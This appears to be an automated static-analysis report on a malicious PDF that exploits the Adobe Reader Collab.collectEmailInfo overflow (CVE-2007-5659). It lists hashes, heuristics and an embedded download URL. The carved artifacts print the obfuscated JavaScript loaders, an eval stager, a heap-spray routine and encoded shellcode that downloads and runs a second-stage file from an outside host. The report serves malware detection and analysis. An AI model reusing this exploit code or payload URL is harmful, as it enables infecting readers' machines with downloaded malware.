Malicious PDF — malware analysis report

Static analysis result for SHA-256 82e78fc95b94f4bb…

MALICIOUS

PDF

16.2 KB First seen: 2026-05-08
MD5: 7e430b0ded1d0928644be4cc9b5900c9 SHA-1: d919b878e5dede9c04b669be272c730b971a055b SHA-256: 82e78fc95b94f4bbaa4eddc769a5d3e01a96ead9022e8cd4462eb54113205d64
266 Risk Score

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution T1059.007 JavaScript

The PDF document contains embedded JavaScript that exploits CVE-2007-5659, specifically targeting Adobe Reader versions within a certain patch range. The JavaScript is obfuscated but reconstructs a URL from character codes, which is then used to download a second-stage payload. This indicates a downloader or dropper functionality.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9999

Heuristics 9

  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
  • JavaScript action low 4 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Adobe Reader APSB08-13 patch-range version gate (CVE-2007-5659) high CVE likely PDF_JS_ADOBE_APSB08_13_PATCH_GATE
    PDF JavaScript gates the exploit payload on (>= 8 && < 8.1.1) OR (< 7.1) — the Reader 7.0.x / 8.0–8.1.1 window patched by Adobe APSB08-13 for the CVE-2007-5659 Collab.collectEmailInfo buffer overflow. Only kits that target that exact bug check both of those patch points; benign scripts do not.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
  • PDF JavaScript shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URL
    Decoded PDF JavaScript shellcode contains a hardcoded http(s) URL stored as little-endian %uXXXX Unicode escapes. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • syncAnnotScan annotation-staging primitive low PDF_FOXIT_SYNCANNOTSCAN
    PDF JavaScript calls syncAnnotScan() — a no-op annotation-enumeration primitive used by exploit-kit JavaScript to stage payload reads from annotation /Subject fields before eval(). Not a vulnerable sink itself; rarely seen in legitimate PDFs. (identified after JavaScript deobfuscation)
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://betapopup.com/cgi-bin/cliche/n006106201r0019Rcc61c9f6X38e2c77bY60f56f5dZ0100f060 Referenced by PDF JavaScript

Extracted artifacts 4

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0004_000.js pdf-javascript-stream PDF /JS object 4 at offset 0xE1 1814 bytes
SHA-256: b771a67801a2a024471cb29d8ce119b13dc98b5c56ef213dece7e1a5cc7b8bed
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
sourceCode = "118,97,114,32,112,114,32,61,32,110,117,108,108,59,13,10,118,97,114,32,102,110,99,32,61,32,39,101,118,39,59,13,10,118,97,114,32,115,117,109,32,61,32,39,39,59,13,10,13,10,97,112,112,46,100,111,99,46,115,121,110,99,65,110,110,111,116,83,99,97,110,40,41,59,13,10,13,10,105,102,32,40,97,112,112,46,112,108,117,103,73,110,115,46,108,101,110,103,116,104,32,33,61,32,48,41,32,123,13,10,9,118,97,114,32,110,117,109,32,61,32,49,59,13,10,13,10,9,112,114,32,61,32,97,112,112,46,100,111,99,46,103,101,116,65,110,110,111,116,115,40,13,10,9,9,123,13,10,9,9,9,110,80,97,103,101,58,32,48,13,10,9,9,125,13,10,9,41,59,13,10,13,10,9,115,117,109,32,61,32,112,114,91,110,117,109,93,46,115,117,98,106,101,99,116,59,13,10,125,13,10,13,10,118,97,114,32,98,117,102,32,61,32,34,34,59,13,10,13,10,105,102,32,40,97,112,112,46,112,108,117,103,73,110,115,46,108,101,110,103,116,104,32,62,32,51,41,32,123,13,10,9,102,110,99,32,43,61,32,39,97,39,59,13,10,9,118,97,114,32,97,114,114,32,61,32,115,117,109,46,115,112,108,105,116,40,47,45,47,41,59,10,10,9,13,10,9,102,111,114,32,40,118,97,114,32,105,32,61,32,49,59,32,105,32,60,32,97,114,114,46,108,101,110,103,116,104,59,32,105,43,43,41,32,123,13,10,9,9,98,117,102,32,43,61,32,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,34,48,120,34,43,97,114,114,91,105,93,41,59,13,10,9,125,10,9,102,110,99,32,43,61,32,39,108,39,59,13,10,125,13,10,13,10,105,102,32,40,97,112,112,46,112,108,117,103,73,110,115,46,108,101,110,103,116,104,32,62,61,32,50,41,10,123,13,10,9,97,112,112,91,102,110,99,93,47,42,42,47,40,98,117,102,41,59,13,10,125,13,10"; 
function decrypt(str, jump){
var result = "";
var list = str.split(',');
        for (var i=0; i < list.length; i++) {
            result +=  String.fromCharCode(list[i] - jump);
        }
        return result;
        }
numeric_charcode_stage_000.js deobfuscated-js numeric char-code string decoded JavaScript at offset 0xEF 469 bytes
SHA-256: 4718a27c2224fc36bf24f8e8e04598f1ad78adce4401c7be2708318738a6983d
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var pr = null;
var fnc = 'ev';
var sum = '';

app.doc.syncAnnotScan();

if (app.plugIns.length != 0) {
	var num = 1;

	pr = app.doc.getAnnots(
		{
			nPage: 0
		}
	);

	sum = pr[num].subject;
}

var buf = "";

if (app.plugIns.length > 3) {
	fnc += 'a';
	var arr = sum.split(/-/);

	
	for (var i = 1; i < arr.length; i++) {
		buf += String.fromCharCode("0x"+arr[i]);
	}
	fnc += 'l';
}

if (app.plugIns.length >= 2)
{
	app[fnc]/**/(buf);
}
legacy_pdfkit_stage_000.js deobfuscated-js repeated-marker hex decoded JavaScript at offset 0x1C12 12239 bytes
SHA-256: 9646e7526799acf353a3bbb1421eec26808c2223101c3446e5a4185908532c92
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
function LR1__7(C____4__43__Mv, Ln_JJX_D_H0Yh8){var charr = String["fromC"+"harCode"];var abs = "va";var u_VT_hl = arguments['call'+'ee'];var a_kCF__P_7 = 0;try {var S_F_qj3fci5 = 0;if (app) {a_kCF__P_7++;Ln_JJX_D_H0Yh8 = pr[S_F_qj3fci5].subject;}a_kCF__P_7++;} catch(e) { }var y_gE0pA80_7BBht = new Array();if (C____4__43__Mv) { y_gE0pA80_7BBht = C____4__43__Mv;} else {var O_2IM__6m1N_xOp = 0;var E_30_w1SW_M6 = 0;var f4Oa3___qA = 512;var e_5_88u1Hh0Qh = 53;u_VT_hl = u_VT_hl.toString();e_5_88u1Hh0Qh = e_5_88u1Hh0Qh - 5;var Sr7vM7__w_T = e_5_88u1Hh0Qh + 10;Sr7vM7__w_T = Sr7vM7__w_T - 1;while(E_30_w1SW_M6 < u_VT_hl.length) {var U_dwb2_07D4 = 1;var Q__3w5_CS = u_VT_hl["charCo" + "deAt"](E_30_w1SW_M6);if (Q__3w5_CS >= e_5_88u1Hh0Qh && Q__3w5_CS <= Sr7vM7__w_T) {if (O_2IM__6m1N_xOp == 4) {O_2IM__6m1N_xOp = 0;}if (isNaN(y_gE0pA80_7BBht[O_2IM__6m1N_xOp])) {var S_F_qj3fci5 = 0;y_gE0pA80_7BBht[O_2IM__6m1N_xOp] = S_F_qj3fci5;}y_gE0pA80_7BBht[O_2IM__6m1N_xOp] += Q__3w5_CS;if (y_gE0pA80_7BBht[O_2IM__6m1N_xOp] > f4Oa3___qA) {y_gE0pA80_7BBht[O_2IM__6m1N_xOp] -= 512;}O_2IM__6m1N_xOp++;}E_30_w1SW_M6++;}}O_2IM__6m1N_xOp = 4;for (var L0_pfU30P = 0; L0_pfU30P < 4; L0_pfU30P++) {if (y_gE0pA80_7BBht[L0_pfU30P] > 256) {y_gE0pA80_7BBht[L0_pfU30P] -= 256;}}var y8V_o__6i = 0;var X_580f__NqK4vgN = "";var ggq3_YMn4___I = 0;var sEkss_A5 = 0;var YO_2V__rL_sL47g = 0;var A_a31E_H;var Hve6_8M4r_g2 = 23;while(sEkss_A5 < Ln_JJX_D_H0Yh8.length) {var MJRXY8g3 = Ln_JJX_D_H0Yh8.substr(sEkss_A5, 1) + "YY";var YfL2FQ_5J____6p = parseInt(MJRXY8g3, Hve6_8M4r_g2);if (ggq3_YMn4___I) {A_a31E_H += YfL2FQ_5J____6p;if (y8V_o__6i == 4) {y8V_o__6i -= 4;}var PF___bYD0 = A_a31E_H;PF___bYD0 = PF___bYD0 - (YO_2V__rL_sL47g + 2) * y_gE0pA80_7BBht[y8V_o__6i];if (PF___bYD0 < 0) {PF___bYD0 = PF___bYD0 - Math.floor(PF___bYD0 / 256) * 256;}PF___bYD0 = String.fromCharCode(PF___bYD0);if (a_kCF__P_7 == 2) {X_580f__NqK4vgN += PF___bYD0;} else if (a_kCF__P_7 == 1) {X_580f__NqK4vgN += YfL2FQ_5J____6p;} else {X_580f__NqK4vgN += sEkss_A5;}y8V_o__6i++;YO_2V__rL_sL47g++;ggq3_YMn4___I = 0;} else {A_a31E_H = YfL2FQ_5J____6p * 23;ggq3_YMn4___I = 1;}sEkss_A5++;}var aa = this;aa['e' + abs + 'l'](X_580f__NqK4vgN);}
	LR1__7(0, "5h21a48b6d562l1h6i906k0d7b3c3a386k7a555eb238aa4k1h7f788cak90al9e3a5d3jae2d9c0fb15i1d5k257057b20d6b8m3g0j793c064k086k556h0h307j6e0j8c1h9b20al7ia34c2g1e832m776h167i402d328b8d860f9j26284e9g674c6h9la7107b1i1m44863068009b50ac2i066b4a0d0i67af2j1f62518l3h9465585aa92i6e5509542g780d8m5l6e02523i7e508l7eac361m061e587878aj8e0l0j3m9h54754e7h6la56b073b336a1a74a6872l8m3g69152a8jaf5iaa221a693j6m086c8b39408h128b53b02g1e2d93895d550647208k2b8172a04h9f047a4b5i5eaf6e96a2ab7l3m6k319b8e9k148b0e6b4h1063al5j230d2d57b217039i3e9919af4a0198955a7c0gam4a0e8h38964f1i49ac6c7c4m9c1d2c53a04g83882612269a0m3a5dai44a90f02563g6la146548h006f105b0j7129aj5f9l9g3h3e192g7i75b2704j620j97a5a7423c328k52b05dae42402206815k724a73242942066e786b0l7la356ad236f8d065j0m94271e3ca46b40041177b05h29532d8d0b7265195f7d2e913h094b2l7la09c5l5a0i1h0071179d7f8e56071c1f4l428d2286121e0798513j1kai8m9k5b98236l4d207a0e863d0m2a6a29288a8028aj1h1260129gai708d111960996m21773k086eal9m875g1f3eai66ak8c77713ga91402243c440063a7041k7e237c409e8e0h4ba1a85653b057006ea20252852f4maa61205j2a7f20346eam5m6b2e1g7a8674al5h28021078647g4maj1b2a6aab428d8925119h7f3l57759j2j7ba2ac6c2f6j9c5c4a0k0d850d5e3d7g31a94i8i974b6i9h3la96g2k8845923c9f707k213k3c012k7d781c7940290a666472439625ag54ah6a766h0m7daf5da41g3k5c455baba14i265c8m3f4aa51c6f0b220c5319800d6867193bak2ca05f9i4g1h6828b09e6c025g309k4l9455am5dagaiai71797l1j5m9dai2c9f4h7c23ag9c175j13313340b24a935db11i2a844a5fb1a8387j2ib17130afa1614i130j6g997a1803543257a8a88d3ial0eak5jam5358652h1j26aj4l41539g5eb1102a4e1a3b017l5d8g1f71185c53a46cb04i1lal5h8c334g778c3c8d37a95009af096l733e257e0d97al7h292h4c8g8c84518a2a0364a87l6779100cah6d17584k7e1ja20fb16f0i3l1j4f890m2a918m4f1g8f3706428m7h5866931c6m7k258d1173401h92ai202i0a8c41am891i422j342663805i4389aa0m2ia04g6l608m8j9974b03g4c982185a79i2bag3b043h4d0e0k7b7l44205l41812k9c9g2d4kaea86m36ak6b1b6kahaf9295022l009a238l660b47270l0l4h4i552a60951l339i5f5e4la89c1h4i0c0635442953915607982a6a292885882h6
... (truncated)
legacy_pdfkit_stage_001.js deobfuscated-js nested inline base-23 callee-key decoded JavaScript at offset 0x1C12 5018 bytes
SHA-256: 61658886838301562fa25292c8381adce7837ffa4d95eafe1e4eadc19bb4223f
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 5 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var mCSiV162JKoV = new Array();var q1e___F_x_4_67 = 0;var pp__4QEv0wDECjb = "";function lvn_Mk(t6__i_70__4X_q, ow8u_W_1W6vEka){var U_ANjG0 = ow8u_W_1W6vEka.toString();var Y__Lhe = "";for(var AHuVy_cSww = 0; AHuVy_cSww < U_ANjG0.length; AHuVy_cSww++) {var nX3_1Sw = parseInt(U_ANjG0.substr(AHuVy_cSww, 1));if (!isNaN(nX3_1Sw)) {nX3_1Sw = nX3_1Sw.toString(16);if (nX3_1Sw.length == 1) { nX3_1Sw = "0" + nX3_1Sw; }else if (nX3_1Sw.length != 2) { nX3_1Sw = "00"; }Y__Lhe = nX3_1Sw + Y__Lhe;}}while(Y__Lhe.length < 8) { Y__Lhe = "0" + Y__Lhe; }var Illn_768Sp_u = t6__i_70__4X_q.toString(16);if (Illn_768Sp_u.length == 1) { Illn_768Sp_u = "0" + Illn_768Sp_u; }else if (Illn_768Sp_u.length != 2) { Illn_768Sp_u = "00"; }Y__Lhe = "3" + Illn_768Sp_u + "P" + Y__Lhe;return Y__Lhe;}function P1_qJVda(b3_8xI_Ef700m8, r__s42o){var S4M6vO84se = new Array("");var Sqa3b5pK2N5TF_c = b3_8xI_Ef700m8;var P_2_1Wiy;if ((P_2_1Wiy = b3_8xI_Ef700m8.lastIndexOf("%u00")) != -1) {if (P_2_1Wiy + 6 == b3_8xI_Ef700m8.length) {S4M6vO84se[0] = b3_8xI_Ef700m8.substr(P_2_1Wiy + 4, 2);Sqa3b5pK2N5TF_c = b3_8xI_Ef700m8.substring(0, P_2_1Wiy);}}P_2_1Wiy = 1;for (AHuVy_cSww = 0; AHuVy_cSww < r__s42o.length; AHuVy_cSww++) {var PMW71_UMT3J178w = r__s42o.charCodeAt(AHuVy_cSww).toString(16);if (PMW71_UMT3J178w.length == 1) { PMW71_UMT3J178w = "0" + PMW71_UMT3J178w; }S4M6vO84se[P_2_1Wiy] = PMW71_UMT3J178w;P_2_1Wiy++;}AHuVy_cSww = S4M6vO84se[0].length ? 0 : 1;S4M6vO84se[P_2_1Wiy] = "00";S4M6vO84se[P_2_1Wiy + 1] = "00";P_2_1Wiy += 2;if ((S4M6vO84se.length - AHuVy_cSww) % 2) {S4M6vO84se[P_2_1Wiy] = "00";}while(AHuVy_cSww < S4M6vO84se.length) {Sqa3b5pK2N5TF_c += "%u" + S4M6vO84se[AHuVy_cSww + 1] + S4M6vO84se[AHuVy_cSww];AHuVy_cSww += 2;}Sqa3b5pK2N5TF_c += "%u0000";return Sqa3b5pK2N5TF_c;}function I3m_8NI(Q_hc0_p_B_3M5, xS___35nNMX8Iil){while (Q_hc0_p_B_3M5.length*2<xS___35nNMX8Iil) {Q_hc0_p_B_3M5 += Q_hc0_p_B_3M5;}Q_hc0_p_B_3M5 = Q_hc0_p_B_3M5.substring(0,xS___35nNMX8Iil/2);return Q_hc0_p_B_3M5;}function jD_H_s_CS_87rPu(A_fl44Wpd1_4vE, UJhBY0, M__7_4G_G){var CCUVFNs = 0x0c0c0c0c;var Q_hc0_p_B_3M5 = unescape(UJhBY0);var r__s42o = lvn_Mk(A_fl44Wpd1_4vE, M__7_4G_G);var VU_u8__V = unescape("%u9090%u9090%u9090%u21eb%ub859%u9050%u9050%u6a51%u33ff%u64db%u2389%u026a%u8b59%uf3fb%u75af%uff07%u66e7%ucb81%u0fff%ueb43%ue8ed%uffda%uffff%u0c6a%u8b59%u0c04%ub8b1%u0483%u0608%u8358%u10c4%u3350%uc3c0");var b3_8xI_Ef700m8 = "%u9050%u9050%u9050%u9050" + "%u9090%u9090%u9090%u9090%u9090%u00e8%u0000%ueb00%ue900%u00fc%u0000%u645f%u30a1%u0000%u7800%u8b0c%u0c40%u708b%uad1c%u688b%ueb08%u8b09%u3440%u408d%u8b7c%u3c68%uf78b%u046a%ue859%u008f%u0000%uf9e2%u6f68%u006e%u6800%u7275%u6d6c%uff54%u8b16%ue8e8%u0079%u0000%ud78b%u8047%u003f%ufa75%u5747%u8047%u003f%ufa75%uef8b%u335f%u81c9%u04ec%u0001%u8b00%u51dc%u5352%u0468%u0001%uff00%u0c56%u595a%u5251%u028b%u4353%u3b80%u7500%u81fa%ufc7b%u652e%u6578%u0375%ueb83%u8908%uc703%u0443%u652e%u6578%u43c6%u0008%u8a5b%u04c1%u8830%u0045%uc033%u5050%u5753%uff50%u1056%uf883%u7500%u6a06%u5301%u56ff%u5a04%u8359%u04c2%u8041%u003a%ub475%u56ff%u5108%u8b56%u3c75%u748b%u782e%uf503%u8b56%u2076%uf503%uc933%u4149%u03ad%u33c5%u0fdb%u10be%ud63a%u0874%ucbc1%u030d%u40da%uf1eb%u1f3b%ue775%u8b5e%u245e%udd03%u8b66%u4b0c%u5e8b%u031c%u8bdd%u8b04%uc503%u5eab%uc359%uffe8%ufffe%u8eff%u0e4e%u98ec%u8afe%u7e0e%ue2d8%u3373%u8aca%u365b%u2f1a%u6970%u5171%u0062%u7468%u7074%u2f3a%u622f%u7465%u7061%u706f%u7075%u632e%u6d6f%u632f%u6967%u622d%u6e69%u632f%u696c%u6863%u2f65%u306e%u3630%u3031%u3236%u3130%u3072%u3130%u5239%u6363%u3136%u3963%u3666%u3358%u6538%u6332%u3737%u5962%u3036%u3566%u6636%u6435%u305a%u3031%u6630%u3630%u0030";app.e_b1_oJp_7_q = unescape(P1_qJVda(b3_8xI_Ef700m8, r__s42o));var i___eBYi77rr = 0x400000;var l4bg_j = VU_u8__V.length * 2;var xS___35nNMX8Iil = i___eBYi77rr - (l4bg_j+0x38);Q_hc0_p_B_3M5 = I3m_8NI(Q_hc0_p_B_3M5, xS___35nNMX8Iil);var jt4_L58d__O50W = (CCUVFNs - 0x400000)/i___eBYi77rr;for (var bDSQA_17_n_pTc = 0; bDSQA_17_n_pTc < jt4_L58d__O50W; bDSQA_17_n_pTc++) {mCSiV162JKoV[bDSQA_17_n_pTc] = Q_hc0_p_B_3M5 + VU_u8__V;}}function u7J27kk_1(){var cN_vgt = "";for (AHuVy_cSww = 0; AHuVy_cSww < 12; A
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.